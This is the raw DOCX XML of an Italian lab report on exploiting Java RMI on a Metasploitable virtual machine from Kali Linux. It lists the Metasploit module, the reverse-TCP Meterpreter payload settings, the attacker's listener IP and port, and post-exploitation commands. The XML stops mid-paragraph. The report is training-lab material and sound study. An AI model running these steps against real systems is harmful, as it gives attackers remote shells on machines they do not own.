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Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Report: Sfruttamento della Vulnerabilità Java RMI su Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obiettivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Sfruttare la vulnerabilità Java RMI sulla macchina Metasploitable per ottenere una sessione Meterpreter e raccogliere informazioni sulla configurazione di rete e sulla tabella di routing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Preparazione dell'Ambiente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>1. Configurazione delle Macchine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Macchina Attaccante: Ho configurato una macchina KALI Linux con l'indirizzo IP 192.168.11.111.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Macchina Vittima: Ho configurato Metasploitable con l'indirizzo IP 192.168.11.112.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1926590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1926590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2. Avvio di Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Ho aperto un terminale nel mio KALI Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Ho digitato `msfconsole` per avviare la console Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4693285" cy="3074670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Immagine3"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Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4693285" cy="3074670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configurazione e Utilizzo dell'Exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Selezione del Modulo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Nella console Metasploit, ho utilizzato il comando:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">     “</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>use exploit/multi/misc/java_rmi_server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">     “</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Configurazione del Modulo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Ho impostato il target e le opzioni dell'exploit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="4543425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Immagine4" descr="Immagine che contiene testo, schermata,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4" descr="Immagine che contiene testo, schermata, menu&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4543425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spiegazione settaggi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- set RHOST 192.168.11.112:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Imposta l'indirizzo IP del server remoto da attaccare a 192.168.11.112.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- set RPORT 1099:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Imposta la porta remota a cui connettersi sul server bersaglio al numero 1099. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- set PAYLOAD java/meterpreter/reverse_tcp:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Specifica di usare il payload "java/meterpreter/reverse_tcp". Questo è un payload per ottenere una shell Meterpreter in Java usando una connessione TCP reverse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- set LHOST 192.168.11.111:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Imposta l'indirizzo IP locale a cui il payload invierà la connessione reverse, in questo caso 192.168.11.111.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>- set LPORT 4444:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Imposta la porta locale su cui ricevere la connessione reverse dal payload, qui al numero 4444.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Questi comandi configurano l'exploit per attaccare un server Java remoto all'indirizzo 192.168.11.112 sulla porta 1099, usando un payload Meterpreter Java reverse TCP che invierà la connessione inversa all'host locale 192.168.11.111 sulla porta 4444.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Successivamente ho verificato le opzioni con il comando:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  “</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Esecuzione dell'Exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Ho lanciato l'exploit con il comando:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">     “</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  “</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Una volta riuscito, ho ottenuto una sessione Meterpreter sulla macchina vittima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1184275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Immagine5"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5" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1184275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Raccolta delle Informazioni</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Ottenimento della Configurazione di Rete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Nella sessione Meterpreter, ho utilizzato il comando “ifconfig”:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4000500" cy="2796540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Immagine6"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descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4000500" cy="2796540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Questo comando mi ha fornito dettagli sulle interfacce di rete della macchina Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Visualizzazione della Tabella di Routing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>- Nella stessa sessione Meterpreter, ho eseguito il comando “route”:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5426075" cy="2078990"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Immagine7"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7" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5426075" cy="2078990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
